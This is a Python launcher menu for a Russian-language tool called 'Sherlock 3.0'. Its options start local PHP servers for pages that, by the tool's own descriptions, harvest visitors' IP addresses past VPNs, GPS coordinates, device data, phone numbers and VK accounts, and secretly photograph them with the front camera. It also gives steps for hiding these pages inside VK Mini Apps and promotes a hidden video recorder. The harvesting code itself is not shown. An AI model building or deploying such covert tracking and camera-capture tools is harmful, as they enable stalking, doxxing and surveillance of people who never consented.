import os
while True:
	os.system("clear")
	print("""
\033[45mx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x\033[0m
              ____
     <_____  .'  `\__     \033[44m★\033[44m★\033[44m★\033[44m	\033[0m      
     /////|\ |_.-'_)    \033[43mSherlock\033[42m3.0\033[0m
    <_______\/    '\  (       <o>   
    //////|\ \|   -{.  )         <o>
     ////  |\ \___/ \[]
     ///    |\/-_`\    <o>
     //       '    \                
\033[45mx-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x\033[0m

	\033[43m<1>\033[0m \033[32mГлаз шерлока\033[0m - работает через камеру смартфона, позволяет распознавать /вещи/предметы/лица и т.п 
	\033[43m<2>\033[0m \033[32mОбратная связь\033[0m - по вопросам и не вопросам, идеям и т.п  ...
	\033[43m<3>\033[0m \033[32mWeb логер\033[0m - позволяет получить IP адрес(Если имеется прокси или ВПН, то попытается обойти), регион, провайдер, координаты по GPS, информацию о девайсе и браузере с которого посетил страницу, попытается определить номер телефона посетителя или номера телефонов людей по близости к нему. Так же доступно подключение к MiniApp VK. (При подключении к MiniApp VK, также определяет аккаунт в VK посетителя страницы). Укажите \033[44m<03>\033[0m, для запуска сервера.
	\033[43m<4>\033[0m \033[32mWebCam\033[0m - Делает снимок с передней камеры посетителя страницы, так же получает IP адрес(Если имеется прокси или ВПН, то попытается обойти), регион, провайдер, информацию о девайсе и браузере, попытается определить номер телефона посетителя или номера телефонов людей по близости к нему. Доступно подключение к MiniApp VK. (При подключении к MiniApp VK, также определяет аккаунт в VK посетителя страницы). Укажите \033[44m<04>\033[0m, для запуска сервера.
	\033[43m<5>\033[0m \033[32mVideoMag\033[0m - Запись видео в фоновом режиме.
	\033[43m<6>\033[0m \033[32mVK MiniApps\033[0m - Краткая инструкция для подключения \033[43m<3>\033[0m и \033[43m<4>\033[0m к MiniApps VK.
	\033[43m<7>\033[0m \033[32m???\033[0m - тут пока ничего нет, но скоро будут ваши идеи.
	""".replace("	", " ").replace("★", "\033[33m★\033[0m"))
	user_en = input("[S]: ")
	if(user_en == "1"):
		os.system("python3 ./push.py")
	elif(user_en == "2"):
		os.system("clear")
		print("vk: https://vk.com/shotfly")
		input()
	elif(user_en == "3"):
		os.system("python3 ./logger.py")
	elif(user_en == "03"):
		print("Укажите порт(По умолчанию 8080)")
		p = input("[S][L]port: ")
		if(p == ""):
			p = "8080"
		print("Web сервер запущен по адресу: localhost:"+p)
		print("Путь до логов сервера - logs/trash.log")
		print("<o><o><o><o><o><o><o><o><o><o><o>")
		os.system("cd ./www/logger && php -S localhost:"+p+" > ./../../logs/trash.log")
	elif(user_en == "4"):
		os.system("python3 ./webcam.py")
	elif(user_en == "04"):
		print("Укажите порт(По умолчанию 8080)")
		p = input("[S][W]port: ")
		if(p == ""):
			p = "8080"
		print("Web сервер запущен по адресу: localhost:"+p)
		print("Путь до логов сервера - logs/trash.log")
		print("<o><o><o><o><o><o><o><o><o><o><o>")
		os.system("cd ./www/webcam && php -S localhost:"+p+" > ./../../logs/trash.log")
	elif(user_en == "5"):
		os.system("clear")
		print("""

           +------O--+
           |   /  \  |
           |   \__/  |
           +---------+
		""")
		print("\033[32mФоновый видеомагнитофон\033[0m - записывает видео в фоновом режиме.\n★ Неограниченное количество видеозаписей.\n★ Нет звука затвора камеры.\n★ Запись с предварительным просмотром или без него (как вы настраиваете).\n★ Поддержка сохранения видеозаписи на SD-карту (внешняя SD-карта)\n★ Одно касание, чтобы начать / остановить запись.\n★ Поддержка ориентации видео\n★ Можно записывать во время телефонного звонка.\n★ Выключите экран и продолжайте запись в фоновом режиме.\n★ Поддерживает переднюю и заднюю камеру.\n★ Запись видео Full HD (1920x1080).\n★ Легко настроить продолжительность, камеру и качество видео.\n★ Включить / отключить уведомление, экранное сообщение при запуске / остановке записи.\n★ Проверьте свободное пространство перед записью.\n★ Легко открыть папку, содержащую записанные видео.\n★ Защитите приложение с помощью кодовых замков. \n\n Скачать приложение можно тут: \n \033[35mhttps://play.google.com/store/apps/details?id=com.camera.secretvideorecorder&hl=ru&gl=US\033[0m ".replace("★", "\033[33m★\033[0m"))
		input()
	elif(user_en == "6"):
		os.system("clear")
		print("""\033[34m
         _____
        /     \ 
        | V K |
        \_____/\033[44m\033[32m[MiniApp]\033[0m
        \033[0m
\033[43mПодключение к MiniApp:\033[0m
1) Открывем страницу https://vk.com/editapp?act=create
2) Указываем название для приложения
3) В платформе выбор ставим на "Встраиваемое приложение" и выбираем тип \033[32mVK Mini Apps\033[0m
4) Переходим в настройки и указываем в ссылки, ссылку на страницу созданную от Шерлока.
5) В состоянии указываем "Работает и видно всем"
		""")
		input()
		
		
		
		
		
		
		
		
		
		
